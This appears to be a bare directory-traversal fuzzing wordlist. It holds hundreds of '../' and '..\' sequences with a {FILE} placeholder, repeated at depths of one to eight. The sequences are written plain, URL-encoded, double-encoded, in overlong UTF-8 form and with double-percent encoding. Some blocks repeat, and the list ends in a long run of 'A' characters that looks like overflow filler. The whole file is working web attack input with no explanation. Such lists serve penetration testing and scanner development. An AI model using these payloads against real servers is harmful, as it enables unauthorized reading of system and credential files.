%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA